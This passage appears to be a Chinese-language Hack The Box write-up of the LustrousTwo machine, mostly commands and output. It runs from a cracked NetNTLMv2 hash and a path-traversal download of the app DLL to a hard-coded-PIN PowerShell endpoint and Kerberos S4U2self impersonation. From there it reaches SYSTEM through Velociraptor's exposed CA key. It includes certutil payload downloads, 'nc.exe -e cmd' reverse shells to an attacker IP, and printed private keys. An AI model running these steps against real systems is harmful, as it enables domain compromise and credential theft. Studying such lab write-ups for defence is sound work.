[SMB] NTLMv2-SSP Hash : ShareSvc::LUSTROUS2:1122334455667788:F8B3C11E2F39AE180632B75175B70F1F:0101000000000000002ADB52B032DC012F03570EF9D5592A0000000002000800570036003300370001001E00570049004E002D0037004800540045005100310036004700560049004E0004003400570049004E002D0037004800540045005100310036004700560049004E002E0057003600330037002E004C004F00430041004C000300140057003600330037002E004C004F00430041004C000500140057003600330037002E004C004F00430041004C0007000800002ADB52B032DC0106000400020000000800300030000000000000000000000000210000AE972424DE6B03A30FE88312226BF5A0C0DD4B9989FCBE34749705FE9C065CA10A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00390031000000000000000000
[*] Skipping previously captured hash for LUSTROUS2\ShareSvc
[*] Skipping previously captured hash for LUSTROUS2\ShareSvc
1.7. hashcat
hashcat.exe hash.txt rockyou.txt
SHARESVC::LUSTROUS2:1122334455667788:f8b3c11e2f39ae180632b75175b70f1f:0101000000000000002adb52b032dc012f03570ef9d5592a0000000002000800570036003300370001001e00570049004e002d0037004800540045005100310036004700560049004e0004003400570049004e002d0037004800540045005100310036004700560049004e002e0057003600330037002e004c004f00430041004c000300140057003600330037002e004c004f00430041004c000500140057003600330037002e004c004f00430041004c0007000800002adb52b032dc0106000400020000000800300030000000000000000000000000210000ae972424de6b03a30fe88312226bf5a0c0dd4b9989fcbe34749705fe9c065ca10a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00390031000000000000000000:#1Service
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SHARESVC::LUSTROUS2:1122334455667788:f8b3c11e2f39ae...000000
Time.Started.....: Wed Oct 01 20:52:29 2025 (1 sec)
Time.Estimated...: Wed Oct 01 20:52:30 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 18536.8 kH/s (2.68ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14344388/14344388 (100.00%)
Rejected.........: 0/14344388 (0.00%)
Restore.Point....: 14155776/14344388 (98.69%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 0213ade -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Temp: 50c Util: 66% Core:1890MHz Mem:8001MHz Bus:8
又获取到一个凭证
SHARESVC \ #1Service
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nxc smb LUS2DC.Lustrous2.vl -u SHARESVC -p '#1Service' -k
SMB LUS2DC.Lustrous2.vl 445 LUS2DC [*] x64 (name:LUS2DC) (domain:Lustrous2.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB LUS2DC.Lustrous2.vl 445 LUS2DC [+] Lustrous2.vl\SHARESVC:#1Service
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# impacket-getTGT Lustrous2.vl/SHARESVC:'#1Service' -dc-ip 10.129.193.58
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in SHARESVC.ccache
但是这个用户还是没有什么用
1.8. web.config
在网站目录下一般都还会有 web.config 文件
它一般的位置是在 \inetpub\wwwroot\web.config ,但是我这里没有获取到它,我使用相对路径一层一层尝试,最终获取到它
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl http://lus2dc.lustrous2.vl/File/Download?fileName=../../web.config --negotiate -u :
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="dotnet" arguments=".\LuShare.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 4E46018E-B73C-4E7B-8DA2-87855F22435A-->
通过LFI漏洞获取了web.config文件,这是一个ASP.NET Core应用的配置文件。
从web.config内容可以看到:
- 这是一个
ASP.NET Core应用 - 应用名称是
LuShare.dll - 使用
AspNetCoreModuleV2模块 - 有日志目录.
\logs\stdout - 有ProjectGuid: 4E46018E-B73C-4E7B-8DA2-87855F22435A
把它弄下来
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl http://lus2dc.lustrous2.vl/File/Download?fileName=../../LuShare.dll --negotiate -u : -o LuShare.dll
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 53760 100 53760 0 0 171k 0 --:--:-- --:--:-- --:--:-- 171k
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# xxd LuShare.dll|head
00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ..............
00000010: b800 0000 0000 0000 4000 0000 0000 0000 ........@.......
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000030: 0000 0000 0000 0000 0000 0000 8000 0000 ................
00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468 ........!..L.!Th
00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f is program canno
00000060: 7420 6265 2072 756e 2069 6e20 444f 5320 t be run in DOS
00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 mode....$.......
00000080: 5045 0000 4c01 0300 6e3a 5597 0000 0000 PE..L...n:U.....
00000090: 0000 0000 e000 2200 0b01 3000 00c8 0000 ......"...0.....
1.9. DLL反编译
使用 dotpeek 进行反编译
分析 FileController.cs 
1.9.1. 文件上传
这是一个ASP.NET Core控制器,包含了文件分享和管理功能
public FileController(IWebHostEnvironment environment)
{
this._environment = environment;
this._uploadFolder = Path.Combine(this._environment.WebRootPath, "uploads");
if (Directory.Exists(this._uploadFolder))
return;
Directory.CreateDirectory(this._uploadFolder);
}
- 初始化上传文件夹路径为
wwwroot/uploads - 如果文件夹不存在则自动创建
GET方法
[Authorize(Roles = "ShareAdmins")]
public IActionResult Upload() => (IActionResult) this.View();
POST方法
[HttpPost]
[Authorize(Roles = "ShareAdmins")]
public async Task<IActionResult> Upload(IFormFile file)
{
if (file == null || file.Length <= 0L)
return (IActionResult) fileController.View();
string fileName = Path.GetFileName(file.FileName);
using (FileStream stream = new FileStream(Path.Combine(fileController._uploadFolder, fileName), FileMode.Create))
await file.CopyToAsync((Stream) stream);
return (IActionResult) fileController.RedirectToAction("Index");
}
- 仅限ShareAdmins角色访问
- 接收上传的文件并保存到uploads文件夹
1.9.2. Download方法 - 文件下载
public IActionResult Download(string fileName)
{
if (string.IsNullOrEmpty(fileName))
return (IActionResult) this.NotFound();
string path = Path.Combine(this._uploadFolder, fileName);
if (!System.IO.File.Exists(path))
return (IActionResult) this.NotFound();
MemoryStream memoryStream = new MemoryStream();
using (FileStream fileStream = new FileStream(path, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
fileStream.CopyTo((Stream) memoryStream);
memoryStream.Position = 0L;
return (IActionResult) this.File((Stream) memoryStream, "application/octet-stream", fileName);
}
- 任何用户都可下载文件
- 返回文件作为二进制流
- 存在路径遍历的问题,虽然使用
Path.Combine(),但没有验证文件名
1.9.3. Debug方法 - PowerShell执行
GET方法
[Authorize(Roles = "ShareAdmins")]
public IActionResult Debug() => (IActionResult) this.View();
POST方法 危险
[Authorize(Roles = "ShareAdmins")]
[HttpPost]
public IActionResult Debug(string command, string pin)
{
>>>> string str = "ba45c518"; // 硬编码PIN
if (string.IsNullOrWhiteSpace(command) || command.Length > 100)
return (IActionResult) this.BadRequest("Invalid or too long command.");
if (!string.IsNullOrWhiteSpace(pin))
{
if (!(pin != str)) // 验证PIN
{
try
{
>>>> using (PowerShell powerShell = PowerShell.Create())
>>>> {
>>>> powerShell.Runspace.SessionStateProxy.LanguageMode = PSLanguageMode.ConstrainedLanguage;
>>>> powerShell.AddScript(command, false);
>>>> Collection<PSObject> collection = powerShell.Invoke();
>>>> // ... 处理结果和错误
>>>> return (IActionResult) this.Content(stringBuilder.ToString(), "text/plain");
}
}
catch (Exception ex)
{
return (IActionResult) this.Content("Error running PowerShell command: " + ex.Message, "text/plain");
}
}
}
return (IActionResult) this.BadRequest("Invalid PIN.");
}
- 这里允许知道pin码的用户执行powershell命令,且PIN码是被硬编码在里面的,且我们知道为
ba45c518 - 能访问这个POST方法的用户必须是
ShareAdmins组的成员 - 使用了
PSLanguageMode.ConstrainedLanguage给了一个受限的PowerShell执行环境,用于限制PowerShell脚本的执行能力。
1.10. 使用 s4u2self 进行身份冒充
那下一步应该就是想办法能拿到这个powershell的执行权限,首先我们得先获取到 ShareAdmins 组的成员凭证
有两个域用户是这个组的成员
SHARON.BIRCH 和 RYAN.DAVIES
且这两个用户是属于 PROTECTED USERS 用户组
这意味着,我们使用银票或委派等技术时,无法"轻易"冒充这些用户。
但是 S4U2self 是一种能够绕过此限制的技术。利用 s4u2self 这个 Kerberos 扩展,允许服务用户以任意主体身份向自身请求服务票据。
在之前我已经获取到了用户 SHARESVC 的TGT,这里可以直接用 Impacket-getST 申请服务票据
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# export KRB5CCNAME=SHARESVC.ccache
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# impacket-getST -self -impersonate ryan.davies -k 'LUSTROUS2.VL/ShareSvc:#1Service' -altservice HTTP/lus2dc.lustrous2.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating ryan.davies
[*] Requesting S4U2self
[*] Changing service from ShareSvc@LUSTROUS2.VL to HTTP/lus2dc.lustrous2.vl@LUSTROUS2.VL
[*] Saving ticket in ryan.davies@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
然后我们导入这个凭证
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# export KRB5CCNAME=Ryan.Davies@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
可以用 klist 看一下是否导入成功
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# klist
Ticket cache: FILE:Ryan.Davies@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
Default principal: Ryan.Davies@lustrous2.vl
Valid starting Expires Service principal
10/01/2025 10:43:25 10/01/2025 18:55:45 HTTP/lus2dc.lustrous2.vl@LUSTROUS2.VL
renew until 10/02/2025 08:55:44
可以看到我们已经导入成功了
但最好在用curl确认一下能不能访问
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl --negotiate -u : 10.129.193.58 -I
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvjQdm12lOBYpNKXEFxEVHLV7uVUN0jJDwjluiHi44zZexyzw1ZjleG/+tT2Mp5oqyHAwvNpMK7d56YgITuQpEVjBBz6qzF+2BrGfZEJckrCkVfoTvOtopxyE2hBkvpYnrGOfU5op3n9V+sGd55YVC
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Wed, 01 Oct 2025 15:04:22 GMT
200说明没问题
1.11. debug接口反弹shell
然后重新登录网页
你的身份就变成管理员了
利用Debug接口执行命令
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug \
-X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "command=Get-ChildItem C:\&pin=ba45c518"
C:\datastore
C:\inetpub
C:\PerfLogs
C:\Program Files
C:\Program Files (x86)
C:\Public
C:\temp
C:\Users
C:\Windows
C:\user_2e9c1.txt
也可以在网页执行
然后传 nc.exe 上去,反弹shell即可
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug \
-X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "command=certutil -f -split -urlcache http://10.10.14.91:80/nc.exe&pin=ba45c518"
**** Online ****
0000 ...
6e00
CertUtil: -URLCache command completed successfully.
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug \
-X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "command=./nc.exe -e cmd 10.10.14.91 4444&pin=ba45c518"
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.91] from (UNKNOWN) [10.129.193.58] 56632
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.
C:\inetpub\lushare>whoami
whoami
lustrous2\sharesvc
C:\inetpub\lushare>
2. System
2.1. 利用Velociraptor 提权
在 \Program Files 目录下,你可以发现有些不寻常的目录
C:\Program Files>dir
dir
Volume in drive C is System
Volume Serial Number is 58B1-CECF
Directory of c:\Program Files
04/14/2025 02:57 AM <DIR> .
04/14/2025 03:05 AM <DIR> Amazon
08/31/2024 01:03 AM <DIR> Common Files
09/06/2024 05:39 AM <DIR> dotnet
09/06/2024 05:38 AM <DIR> IIS
04/14/2025 04:50 PM <DIR> Internet Explorer
05/08/2021 01:20 AM <DIR> ModifiableWindowsApps
>>>> 09/06/2024 08:35 AM <DIR> Velociraptor
>>>> 09/06/2024 08:34 AM <DIR> VelociraptorServer
04/14/2025 02:57 AM <DIR> VMware
08/31/2024 01:55 AM <DIR> Windows Defender
06/26/2025 07:12 AM <DIR> Windows Defender Advanced Threat Protection
04/14/2025 04:50 PM <DIR> Windows Mail
04/14/2025 04:50 PM <DIR> Windows Media Player
05/08/2021 02:35 AM <DIR> Windows NT
04/14/2025 04:50 PM <DIR> Windows Photo Viewer
05/08/2021 01:34 AM <DIR> WindowsPowerShell
0 File(s) 0 bytes
17 Dir(s) 4,740,476,928 bytes free
c:\Program Files>
Velociraptor 是 Rapid7 开发的一款数字取证/事件响应工具,旨在从终端设备收集数据。
这里还有一个 VelociraptorServer 的文件夹,说名这台机器既是迅猛龙客户端也是服务端
c:\Program Files\VelociraptorServer>dir
dir
Volume in drive C is System
Volume Serial Number is 58B1-CECF
Directory of c:\Program Files\VelociraptorServer
09/06/2024 08:34 AM <DIR> .
04/14/2025 02:57 AM <DIR> ..
09/06/2024 08:34 AM 2,563 client.config.yaml
>>>> 09/29/2025 07:38 AM 13,056 server.config.yaml
09/06/2024 08:03 AM 60,144,064 velociraptor-v0.72.4-windows-amd64.exe
3 File(s) 60,159,683 bytes
2 Dir(s) 4,740,337,664 bytes free
c:\Program Files\VelociraptorServer>type server.config.yaml
<SNIP>
>>>> CA:
>>>> private_key: |
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA4ycNgoEBGTgOFhs9okotlq3uN9lxxjzZkkgm+O0xtwSFu2D7
w+9363BIYV9osVi1z6X7O6kHTHvWYua1dekYF8NuUfcdd2sFOdSfylHjYjMZq0Af
SkglBzt3vJAxLiwtMFduiu+k1V/CiJtL5JST+Jqb+zI/QoBwTeKhsE6gdcu4dsMk
2p1CZcGrGP5RlObu8OMI9s+vjjjgPv0vTRIid0sPn3HfnZmtgpM6hRGIqGtxhA/r
3iH7vjhUclmjtz3HtoFee2V55YtwIbUDKBW9cOZejuSEM4aylO4p3Nykm/JBvtr8
0AeI8Bi1NPsG0pMnJF2PuefdriBt7Vb3cvi/WwIDAQABAoIBAHUmxwjvj6l6B4nP
MtJof2qe+aVEODGNYIjZPYBUlLdXVcF2G2LKNobuueW+VzhgECSv7gqu+lyv4bnQ
UvYk6ZAX8uXDFSdpwqA40NB/u04CHNL9lyWwX6iDOxW9KCAwGH4+GXz+a3zAjov1
zAZvuoEU/C1plMavhzwkDk/nvUoCdrSLNPsz0s0RbNkR7fPcJ2QrwYIyHhNb56Ab
Jyy4A8gXUz0zkL4Upk6bHPxhFeW9gA9BlAcB8DsdcPxTqbrus+B3yrfKO+hqWT0w
/jtDssJxdnkULazO2e9ypEJ2XsNEr4NYi1PcsHD667T6EnKQm6odGWN/455FWbt0
LFfoCkECgYEA7bUZ8wZh8M4C+JRm5fKq7N/pIQniQfDf+naFy7nG+9QiZIsofyHB
0PiuzSXNDEVsaSJn5cn4+BFO1RfRaHmM/sUsrKzaUKO5fTa4aAhZXUBmdw+s1Sm1
HbXea/uKTQEdzwL/tcRBQxIr2RveCCykYO/p5pTd9YKVtCGx5PgOHYcCgYEA9KIE
fqvfHP4NZDbsExC83K3Dgx3MKUlKosyBRVdQW6d/eJJymEa5WcHOxM9Q81ZOi7VS
M3UfU1C1ihCiuYZWNZcFeiBODoQe40nqxBzAklAYtavagMyluP8zdnbnFek1ncDy
IXIdIPv0COBLiJSUkQubcWVRG95mu/h/oMd4pI0CgYEAsknqS6hW32l1OwL75q7L
Wt1amygxpunG5LHvCm2t/IYQwb7KQgiMuXM8kKwwjmqntHdU3DpP3agFq7iwnR7G
DPTQ3DbNjDwwzOS1DXptpI7AC78bD8q3iLA3QmCpS7ZxqCoEp02q8WZ4st+++fyZ
0gdANW0kyZcHN9Mp/aW72JMCgYEAhjImgxJndzEKSZIzWJYS9H/Bw7hh2bgh4EKN
G2u1YkH1FEBJ6qzJWqqNcbtEbehHeC5EZIP4ZizdGVrc2ScPPaCV2ZPFHgNuKkLP
LTuUi+6yT15xo7wfoOcl5PN++q8OwXYpnR1LS1/LU98usELJaPPUFpV8s+wBsVW1
NY6W6LUCgYEA6kDkirjXD9JH6P3+L6k3HPnt9WIQYlBALpPtddBpTezGjNiJYI0L
/GrDzvObjMKSBwwi0kwjKAlYz2TTRercnR5mxGvJP0oAUGH7LE4WNctJ9weSeHVv
8k3Z45vLlh/YEZ8EomicZxJXOmZuzu+lVkQnsJncQrcHXb+eVIzQPjQ=
-----END RSA PRIVATE KEY-----
Frontend:
hostname: localhost
bind_address: 0.0.0.0
<SNIP>
服务器目录中存在一个 server.config.yaml 文件,其中包含证书。这是迅猛龙安装时的默认设置, 官方建议出于安全原因删除这些文件,但并未强制要求:
我们可以利用这些证书,可以生成一个 API 密钥,然后通过服务器 API 在应用程序内以管理员身份执行操作。 可以参考这个文档进行操作
Warning
需要注意的一个细节在于 --name 参数中。如果提供的用户名不存在,该用户将在数据库中创建,但需要重启服务器才能被识别。但我们是无法重启 Velociraptor的,所以需要寻找一个现有用户。你可以server.config.yaml 中找到一个现有用户admin
initial_users:
- name: admin
password_hash: 43b7f91087b5a1bcb978d776a23330d3bf4a2c31017c0b1865ddae21c942e06d
password_salt: 01e48c09468dcde741b493c49904cfdfcb4fa9a188efb27fa233e70265a6d4e5
authenticator:
type: Basic
然后 admin 用户生成一个·管理员权限的API密钥
c:\Program Files\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator c:\temp\api.config.yaml
velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator c:\temp\api.config.yaml
[ERROR] 2025-10-01T08:58:34-07:00 Unable to open file \\?\c:\datastore\config\inventory.json.db: open \\?\c:\datastore\config\inventory.json.db: Access is denied.
[ERROR] 2025-10-01T08:58:34-07:00 Unable to open file \\?\c:\datastore\config\inventory.json.db: open \\?\c:\datastore\config\inventory.json.db: Access is denied.
[ERROR] 2025-10-01T08:58:34-07:00 Unable to open file \\?\c:\datastore\config\inventory.json.db: open \\?\c:\datastore\config\inventory.json.db: Access is denied.
Creating API client file on c:\temp\api.config.yaml.
[ERROR] 2025-10-01T08:58:34-07:00 Unable to open file \\?\c:\datastore\acl\admin.json.db: open \\?\c:\datastore\acl\admin.json.db: Access is denied.
velociraptor-v0.72.4-windows-amd64.exe: error: config api_client: Unable to set role ACL: open \\?\c:\datastore\acl\admin.json.db: Access is denied.
c:\Program Files\VelociraptorServer>dir c:\temp
dir c:\temp
Volume in drive C is System
Volume Serial Number is 58B1-CECF
Directory of c:\temp
10/01/2025 08:50 AM <DIR> .
>>>> 10/01/2025 08:51 AM 4,305 api.config.yaml
1 File(s) 4,305 bytes
1 Dir(s) 4,739,252,224 bytes free
这里提示我们没有权限写入,但实际上已经写入了
c:\Program Files\VelociraptorServer>type c:\temp\api.config.yaml
type c:\temp\api.config.yaml
ca_certificate: |
-----BEGIN CERTIFICATE-----
MIIDSzCCAjOgAwIBAgIQIRnpQjrW1aIURqQbu2cKojANBgkqhkiG9w0BAQsFADAa
MRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwHhcNMjQwOTA2MTUzNDA0WhcNMzQw
OTA0MTUzNDA0WjAaMRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwggEiMA0GCSqG
SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDjJw2CgQEZOA4WGz2iSi2Wre432XHGPNmS
SCb47TG3BIW7YPvD73frcEhhX2ixWLXPpfs7qQdMe9Zi5rV16RgXw25R9x13awU5
1J/KUeNiMxmrQB9KSCUHO3e8kDEuLC0wV26K76TVX8KIm0vklJP4mpv7Mj9CgHBN
4qGwTqB1y7h2wyTanUJlwasY/lGU5u7w4wj2z6+OOOA+/S9NEiJ3Sw+fcd+dma2C
kzqFEYioa3GED+veIfu+OFRyWaO3Pce2gV57ZXnli3AhtQMoFb1w5l6O5IQzhrKU
7inc3KSb8kG+2vzQB4jwGLU0+wbSkyckXY+5592uIG3tVvdy+L9bAgMBAAGjgYww
gYkwDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
AjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTfTRyiGGBqOr5F541v8pOYkcFz
ADAoBgNVHREEITAfgh1WZWxvY2lyYXB0b3JfY2EudmVsb2NpZGV4LmNvbTANBgkq
hkiG9w0BAQsFAAOCAQEAt4tFN1KZF1wrmhOT/1f0DXnwgaACkhJmC2HARfp46hGY
FvqumxwNkUTc0hyPdwK2iy+57RCTS70CgGvsvSf6bDx7jSBpBJ8KzYXxOwcNRPaK
4KJV7ZQQA2U6ax3c5LNuUupY63tRh7j/AgeVvnVP8CLTEvWTHD1kEQ/cTyn0XDSn
7yINImANYuWJkWO6i9eKXYxTGXWhG+n1xEmQvZIed8SsOyt/pvTbFnUtKNTokUnb
B71PNi/CkZRJpULuAk9eJvLgKhEgIeVpY2rxYvVPBJNqwWwGypKOzWGX0+ueQReQ
is5cJn9DbPiu82yg/HdQu9vfroG+QktqdZgx5KJkxA==
-----END CERTIFICATE-----
client_cert: |
-----BEGIN CERTIFICATE-----
MIIDPTCCAiWgAwIBAgIQeITZnz87Nbq0G4KDRXRrETANBgkqhkiG9w0BAQsFADAa
MRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwHhcNMjUxMDAxMTU1ODM0WhcNMzUw
OTI5MTU1ODM0WjAnMRUwEwYDVQQKEwxWZWxvY2lyYXB0b3IxDjAMBgNVBAMTBWFk
bWluMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4gbVwF2uacptUTmK
QbBsKu10CDawirW5JqzLewl0ZczJGCdTH5nATi9KWNzO7DsIEfvUeSMFYgOrYxQ/
mdsR8pKoEYgx5dhSINzVYcd2EiYQlw+kwU3HrPZ4hs6ANVrjNXcPjuOVNQl52+2l
dLUuAhZLcpxlAy4cKnafOyIN9bF6Dh32P9rp7I4PrnqzjJZCfPinVABJNf3mi7lQ
kkg6MXeWpf96xcW/ZELDtPGuSJnl2ZNr2Fmi1gwZ+XZWOynLxLMJHhjfSs1xQ7Z0
QcJaDGuO1aAolpMPkk3u4oCEHMhjA+hIMBadJWzT4WSR/m1NISd3bWBhOZpsPHSD
P2zGkQIDAQABo3IwcDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUH
AwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHwYDVR0jBBgwFoAU300cohhgajq+
ReeNb/KTmJHBcwAwEAYDVR0RBAkwB4IFYWRtaW4wDQYJKoZIhvcNAQELBQADggEB
AOFb+5kqp8jCPhhf5yROfTfKFjNuE56Xp0+/ec/BTtIaQHzkrJmxoK3GI9X4Nco6
jKG1EKdVlqv5pIPBc3tV8f+DTyNtEOAf37no7e3Rsc4Ff2iqx8Iqr5/VxXRNTMdm
mH4WmOhodBEcXiOBvlHuBwbnnsPzwe8g91zfAj8ZWuFO3jENlK3uHVq0Cv7ipc2Y
yo2BmXwq58eYYAYk7vNY4Pg/MUDCJSMplwDomiIU6mMfP/GUBaNQjGkTO5SlLril
sONuLpwGZrNooNeLMvyMTAmikm5OQGc6CV1CXy1LYB/85qqVk6aS8/y/dqfeZMbG
RANkBJW5tmfaF7MPqLsVHdY=
-----END CERTIFICATE-----
client_private_key: |
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4gbVwF2uacptUTmKQbBsKu10CDawirW5JqzLewl0ZczJGCdT
H5nATi9KWNzO7DsIEfvUeSMFYgOrYxQ/mdsR8pKoEYgx5dhSINzVYcd2EiYQlw+k
wU3HrPZ4hs6ANVrjNXcPjuOVNQl52+2ldLUuAhZLcpxlAy4cKnafOyIN9bF6Dh32
P9rp7I4PrnqzjJZCfPinVABJNf3mi7lQkkg6MXeWpf96xcW/ZELDtPGuSJnl2ZNr
2Fmi1gwZ+XZWOynLxLMJHhjfSs1xQ7Z0QcJaDGuO1aAolpMPkk3u4oCEHMhjA+hI
MBadJWzT4WSR/m1NISd3bWBhOZpsPHSDP2zGkQIDAQABAoIBAAIXChbzRs+XnZco
rwyYcwealn4U82D0+TdQVblXhwoB8MIWawBZzZtreIaF1Cv/B74S1A4issQLQKRz
5XqouevCS2eOGNgFPg0rvZVf4MmeLH0ZGe7npzcEOG0Wr7zOkFdIOI6bsB+DbOsJ
sYP4wOooBp6Sr6Rt4rjJzAMh93sUGpf0+ZOa1kKE8+6wxGLb5sJdR5EGgHqzPoV9
3xxFw7n8nSicdujU7XCnjvjyuVOFbVpYXysGztlwKvIGUm3hSP/jCWK+2a7FfkRx
PddX2jZXqKre1A8xxxEdaSyqLEaBd/Tiwjv7wDmsqlQ+I2qarEp5tKnMNfz+faTz
9vOoQRkCgYEA8jaTu//qN/HQFxQSiYz4qYgWcnI6BWlD5X+VbzvS9vkE8aMO6Qp6
FgUlwoHPLDiTq0Lh2pynyI11Ui8DLijzhDABMrykdTELcJG6691YUTL4IrI+jcpX
x7Y1TtrMqGnEkquHMg9TjBgmtfFf+iOhGaKU0F87AFZd7WMmR9RbD1MCgYEA7uRl
P+tG7jz5xF74LznKiaLp1viOtjI6wV7F1/uvj116nAuMOwF9ZRzKXRQAmMVbMWQd
6wuL4qDfR0l98sIRk/hgMOAWc43a6RDRKzU66KlYzevU9gkh0uN/lCt2oR2UGAK+
ZTvN9kIgGHwSQVzfQV9QRUIo2TJz/Pi7Qy6SqgsCgYEAqndWyj12biE1vshVs5EP
gOFSSwGxbBWFv4NnfH2yIDdqD1YfLEw/WDgPNzF8yTaYVzQfGGigfTlxlIGZz2bq
2+GdNkQlyoTV9EfcMhv6CEvC70hbVhdOaDQImJLM7sphmog2AjlfJ33n4K0cS0PA
IfaWnYAoWjhuqp/ZVTxTShkCgYBb2bkMQHv/MbaeyB0Im2HCVb8vBlZouxtYKgZL
qtuvdbOkt9PtA/+gltc/vmcUVh1f+ix+qOvZ8RyoHhus8O0tRXxGjoJTX6FhpzOl
N0w1FJeuZRR2nMBCg3IUGDn+bI76RGPMLJheLMKGZ33lX73/NpR4bJ2kFP//reri
Q8/kTQKBgHyN04TXyHbrIGs89DtvdJu8H79OTb1rZXugvLajBiaG8x5lF2tphXdd
1AdW7ItdXt/WvF+yag8CXJgNlD/g1buKNSoq1HOC4eLH8BK7Tds4rZVM9XjRAXfe
1D8/XQV050OMzwaR9aaXUMWHU+xW/RViT8sLtCqaFneNbXUeE+iQ
-----END RSA PRIVATE KEY-----
api_connection_string: localhost:8001
name: admin
Velociraptor 有一个 execve 插件,可以按照这个文档执行命令即可
c:\Program Files\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['whoami'])"
velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['whoami'])"
[
{
"Stdout": "nt authority\\system\r\n",
"Stderr": "",
"ReturnCode": 0,
"Complete": true
}
]
弹个shell即可
c:\Program Files\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['C:\\inetpub\\lushare\\nc.exe', '-e', 'cmd', '10.10.14.91', '4455'])"
velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['C:\\inetpub\\lushare\\nc.exe', '-e', 'cmd', '10.10.14.91', '4455'])"
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# rlwrap nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.14.91] from (UNKNOWN) [10.129.193.58] 56742
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system